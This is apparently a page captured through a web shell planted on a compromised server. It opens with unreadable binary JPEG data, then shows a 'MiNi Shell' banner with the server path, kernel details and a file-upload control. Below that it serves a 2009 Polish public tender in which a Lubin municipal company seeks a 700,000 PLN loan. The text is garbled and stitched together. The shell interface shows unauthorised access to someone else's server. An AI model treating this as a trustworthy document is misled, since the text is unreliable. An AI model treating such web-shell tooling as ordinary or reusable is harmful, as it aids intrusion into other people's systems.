JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090819/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090819/285488-N-2009.html

<p class="kh_header"><b>Lubin: Udzielenie i obsługa kredytu długoterminowego w wysokości 700.000,00 PLN na sfinansowanie zakupu i remontu nieruchomości</b><br>
<b>Numer ogłoszenia: 285488 - 2009; data zamieszczenia: 19.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Oczyszczania sp. z o.o. w Lubinie , ul. Rzeźnicza 1, 59-300 Lubin, woj. dolnośląskie, tel. (076) 7249940, faks (076) 7249950.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie i obsługa kredytu długoterminowego w wysokości 700.000,00 PLN na sfinansowanie zakupu i remontu nieruchomości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest udzielenie i obsługa kredytu długoterminowego 
w kwocie 700.000,00 PLN na sfinansowanie zakupu i remontu nieruchomości położonej w Lubinie przy ul. Rynek 28/2, nr księgi wieczystej LEU1/00037694/3  z przeznaczeniem na pomieszczenia dla administracji Spółki.
WYMAGANIA SZCZEGÓŁOWE:
1.Waluta kredytu: złoty polski ( PLN)
2.Kredyt udzielony będzie w  jednej transzy w kwocie 700.000,00 PLN  (słownie: siedemset tysięcy złotych ) przelewem na konto Zamawiającego.
3.Okres spłaty: 5 lat ( 60 miesięcy ) od dnia uruchomienia kredytu ( za  dzień uruchomienia kredytu uważa się dzień wpływu kwoty udzielonego kredytu na konto Zamawiającego-kwota kredytu będzie pomniejszona o należną prowizję.)
4.Spłata kapitału: w ciągu 60 miesięcy od dnia uruchomienia kredytu  w okresach miesięcznych do ostatniego dnia  każdego miesiąca. Wykonawca informuje Zamawiającego faksem nie później niż 7 dni przed terminem spłaty rat kapitałowych o spłacie rat kapitałowych.
5.Spłata odsetek: w ciągu 60 miesięcy od dnia uruchomienia kredytu  w okresach miesięcznych  do ostatniego dnia każdego miesiąca  przy zastosowaniu metody naliczania odsetek od kapitału wg  kalendarza rzeczywistego. Wykonawca informuje Zamawiającego   faksem o wysokości naliczonych odsetek nie później niż 7 dni przed terminem spłaty odsetek.
6.Za spłatę kapitału i odsetek przyjmuje się dzień wpływu należności do Wykonawcy. Jeżeli termin płatności przypada na dzień ustawowo wolny od pracy spłata kapitału i odsetek następuje w pierwszym dniu roboczym przypadającym po dniu ustawowo wolnym od pracy.
7.Raty kapitałowe: stałe
8.Karencja: Zamawiający ma prawo do 6 miesięcznego okresu karencji w spłacie rat kapitałowych po uprzednim powiadomieniu Wykonawcy w formie pisemnej, w terminie 30 dni przed zapłatą raty. W okresie karencji następować będzie spłata odsetek.
9.Oprocentowanie kredytu: WIBOR 1M ogłoszony na dzień ostatniego dnia roboczego miesiąca poprzedzającego miesiąc obrachunkowy + stała dla całego okresu kredytowania marża Wykonawcy
10.Dla przygotowania oferty w celu porównywalności cenowej ofert Wykonawca zobowiązany jest przyjąć WIBOR 1M  na dzień ogłoszenia przetargu tj.  z dnia  19.08.2009 r.
11.Prowizja od udzielonego kredytu: Płatna jednorazowo w dniu wypłaty kredytu. Wykonawca wypłaca Zamawiającemu kwotę kredytu pomniejszoną o należną prowizję.
12.Zabezpieczenie: weksel in blanco wraz z deklaracją wekslową do wysokości zobowiązania i zastaw hipoteczny na zakupionej nieruchomości.
13.Wcześniejsza spłata: dopuszcza się możliwość zmiany harmonogramu spłat kredytu 
i wcześniejszą spłatę całości lub części kapitału bez ponoszenia dodatkowych opłat 
i prowizji. Nie będą pobierane odsetki od części kredytu spłaconego w terminie wcześniejszym od daty dokonania wcześniejszej spłaty.
14.Uruchomienie kredytu: kredyt będzie dostępny w dniu podpisania aktu notarialnego na zakup nieruchomości, nie później jednak niż do 15.10.2009 r. 
15.Oprocentowaniu podlega kwota faktycznie wykorzystanego kredytu
16.Wykonawca nie nalicza prowizji za gotowość.
17.Poza kwotami określonymi w ofercie Wykonawca nie pobiera żadnych innych opłat.
18.Zamawiający dopuszcza udział własny w zakupie nieruchomości do wysokości 20% ceny zakupu nieruchomości zapisanej w akcie notarialnym.
19.Zamawiający w celu sporządzenia oferty udostępni Wykonawcy następujące dokumenty:
-Bilans za rok 2008 
-Rachunek zysków i strat za rok 2008  
-Sprawozdanie z przepływów pieniężnych za rok 2008 
-Aktualne sprawozdanie F-01/I-01
-Aktualne Zaświadczenie  z US
-Aktualne Zaświadczenie z ZUS
-NIP, Regon,  KRS
-CIT-8  za 2008 rok
-Inne dokumenty wymagane przez Wykonawcę niezbędne do oceny zdolności kredytowej Zamawiającego, o ile dostarczenie takich dokumentów będzie możliwe przez Zamawiającego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Oferta musi być zabezpieczona wadium w wysokości: 4.000,00 PLN
Słownie: cztery tysiące złotych 
2.Termin wniesienia wadium upływa dnia 27.08.2009 r. o godz. 9.00 
3.Wadium musi obejmować okres związania z ofertą.
Wadium może być wnoszone:
1)w pieniądzu ( wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego, tj. Bank PKO BP. S.A. nr rachunku 91 1020 3017 0000 2302 0174 3046,
2)w poręczeniach  bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem  pieniężnym,
3)gwarancjach bankowych,
4)gwarancjach ubezpieczeniowych.
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz.U. Nr 109, poz. 1158, z późn. zmianami ).
Oznacza to, że w terminie określonym w pkt 2 ( tj. do dnia 27.08.2009  r. do godz. 9.00.) w kasie Zamawiającego muszą znaleźć się w/w formy wadium 
( w przypadku przesłania oferty pocztą i  wnoszenia wadium w formach wyszczególnionych w pkt. 2)-5), należy przesłać w oddzielnej przesyłce   z oznaczeniem: wadium przetargowe do postępowania pn.: Udzielenie i obsługa kredytu długoterminowego w wysokości 700.000,00 PLN na sfinansowanie zakupu i remontu nieruchomości
W przypadku wniesienia wadium  w pieniądzu, WADIUM na koncie Zamawiającego musi się znaleźć się najpóźniej do dnia składania ofert tj. 27.08.2009 r. do godz. 9.00 i oznaczone: wadium przetargowe pn.: Udzielenie i obsługa kredytu długoterminowego w wysokości 700.000,00 PLN na sfinansowanie zakupu i remontu nieruchomości
O uznaniu przez Zamawiającego, że wadium w pieniądzu wniesiono w wymaganym terminie. decyduje data wpływu środków na rachunek bankowy Zamawiającego.
Kopia dokonanego przelewu powinna stanowić załącznik do oferty.
Załączone poręczenie lub gwarancja musi zawierać zobowiązanie zgodnie z art.46 ust 4a  
i ust 5 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.
Zamawiający dokona zwrotu wadium lub zatrzyma wadium zgodnie z warunkami określonymi w art. 46 ustawy z dnia 29 stycznia Prawo zamówień  publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy, którzy ubiegają się o zamówienie publiczne muszą spełniać niżej wymienione warunki :
Warunki podmiotowe:
1.Wykonawca posiada uprawnienia do wykonywania działalności lub czynności będących przedmiotem niniejszego zamówienia. W celu potwierdzenia niniejszego warunku Wykonawca zobowiązany jest przedłożyć dokumenty określone w rozdziale X w pkt 1 ppkt 1), 2) niniejszej SIWZ.
2.Spełnia warunki udziału w postępowaniu określone w art. 22 ust. 1. Ustawy Prawo zamówień publicznych. W celu potwierdzenia niniejszego warunku Wykonawca zobowiązany jest przedstawić oświadczenie określone w rozdziale X w pkt 1 ppkt 3) niniejszej SIWZ
3.Nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. W celu potwierdzenia niniejszego warunku Wykonawca zobowiązany jest przedstawić dokumenty określone w rozdziale X w pkt 1 ppkt 4),5),6),7) niniejszej SIWZ:
Ocena spełniania przez Wykonawcę  przedstawionych powyżej warunków zostanie dokonana poprzez sprawdzenie  kompletności, poprawności oraz aktualności złożonych dokumentów 
i oświadczeń wyszczególnionych w rozdziale X niniejszej SIWZ  wg. formuły: SPEŁNIA - NIE SPEŁNIA..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wymagane dokumenty należy złożyć  w formie oryginałów albo kserokopii  poświadczonej formułą  za zgodność z oryginałem  i podpisane przez Wykonawcę ( lub  przez osoby upoważnione do reprezentowania Wykonawcy ) na każdej ze stron. 
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę. 
1.  Do oferty  wypełnionego formularza ofertowego wg wzoru stanowiącego załącznik nr 1 do SIWZ należy dołączyć następujące oświadczenia i dokumenty:
1)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2)Zezwolenie na prowadzenie działalności bankowej na terenie Polski, a także realizacji usług objętych przedmiotem zamówienia, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. Prawo bankowe ( t.j. Dz. U. z 2002 r. Nr 72, poz. 665 z pózn. zm. ) a w przypadku określonym w art. 178 ust. 1 Ustawy Prawo bankowe inny dokument potwierdzający rozpoczęcie działalności przez dniem wejścia w życie ustawy, o której mowa w art. 193 ustawy Prawo bankowe.
3)oświadczenie o spełnianiu warunków udziału w postępowaniu określone w art. 22 ust. 1 
 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych ( tekst jednolity- Dz. U. z 2007 r. Nr 223, poz. 1655 z póżn. zmianami )- zgodnie z załącznikiem nr 2 do SIWZ.
W przypadku, gdy inne podmioty udostępniają Wykonawcy potencjał techniczny i osoby zdolne do wykonania zamówienia do ww. oświadczenia należy dołączyć ich pisemne zobowiązanie do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
4)aktualnej informacji z Krajowego Rejestru Karnego  w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5)aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym 
w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6)aktualnych zaświadczeń właściwego naczelnika Urzędu Skarbowego potwierdzające, ze wykonawca nie zalega z opłacaniem podatków, opłat, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego Urzędu Skarbowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
7)aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że  Wykonawca  nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że   uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
Pozostałe dokumenty bezwzględnie wymagane w ofercie:
8)Wypełniony Formularz Ofertowy stanowiący załącznik nr 1 do SIWZ.
9)Oświadczenia, że oferowany przedmiot zamówienia spełnia wszystkie warunki wymienione w rozdziale III niniejszej SIWZ Opis przedmiotu zamówienia- Oświadczenie znajduje się w treści formularza ofertowego.
10)Zaparafowane Istotne Warunki Umowy zgodnie z załącznikiem nr 3 do SIWZ
Pełnomocnictwo:
11)Pełnomocnictwo wystawione dla osoby podpisującej ofertę - tylko w przypadku podpisania przez osobę nie uprawnioną do reprezentacji wprost z postanowień KRS lub ewidencji działalność gospodarczej.
12)Dokument ustanawiający pełnomocnika i upoważniający go do podpisywania oferty oraz reprezentowania podmiotów występujących wspólnie w niniejszym postępowaniu - tylko w przypadku złożenia oferty wspólnej.
Pełnomocnictwo  zgodnie z działem VI rozdział II ustawy z dnia 23 kwietnia 1964 - Kodeks Cywilny (DZ. U. Nr 16, poz. 93 z późn. zm. ) winno być złożone w formie oryginału lub kopii poświadczonej notarialnie. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania.
Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej
Do Wykonawcy mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej ma zastosowanie § 2 Rozporządzenia Prezesa Rady Ministrów 
w sprawie rodzajów dokumentów, jakich może zażądać Zamawiający  od Wykonawców, oraz form, w jakich te dokumenty mogą być składane z dnia 19 maja 2006 r. ( Dz.U. Nr 87, poz. 605 )..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mpo.lubin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiebiorstwo Oczyszczania Sp.z o.o., ul. Rzeźnicza1, 59-300 Lubin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.08.2009 godzina 09:00, miejsce: Siedziba zamawiajacego: tj. Rzeźnicza 1, 59-300 Lubin w sekretariacie ( II pietro pokój 305 ).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com